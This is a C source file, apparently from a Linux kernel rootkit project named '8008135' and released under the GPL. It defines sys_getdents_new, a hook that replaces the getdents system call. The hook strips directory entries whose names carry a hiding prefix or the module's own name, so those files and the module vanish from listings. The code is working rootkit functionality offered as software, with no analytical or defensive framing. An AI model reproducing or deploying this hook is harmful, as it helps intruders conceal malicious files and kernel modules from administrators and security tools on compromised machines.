/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
 * main.c
 * Copyright (C) 2019
 *
 * 8008135 is free software: you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * 8008135 is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
/*******************************************************************************/


/**** includes *****************************************************************
*******************************************************************************/
#include "637d3n75.h"

/***  var  ********************************************************************
*******************************************************************************/

sys_getdents_ptr sys_getdents_orig;

/*******************************************************************************/

/***  FUNCTION  ****************************************************************
*          NAME:  sys_getdents_new
*   DESCRIPTION:  function overriding the original getdents
*    PARAMETERS:  -
*       RETURNS:  -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
                                 struct linux_dirent __user *dirent,
                                 unsigned int count){
	int boff;
	struct linux_dirent* ent;

	long ret = sys_getdents_orig(fd, dirent, count);

	char* dbuf;

	if (ret <= 0) {
		return ret;
	}

	dbuf = (char*)dirent;

	for (boff = 0; boff < ret;) {

		ent = (struct linux_dirent*)(dbuf + boff);


		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
			 || (strstr(ent->d_name, MODULE_NAME) != NULL)) {

			memcpy(dbuf + boff,
				   dbuf + boff + ent->d_reclen,
			       ret - (boff + ent->d_reclen));
			ret -= ent->d_reclen;
		} else {

			boff += ent->d_reclen;
		}
	}

	return ret;
}
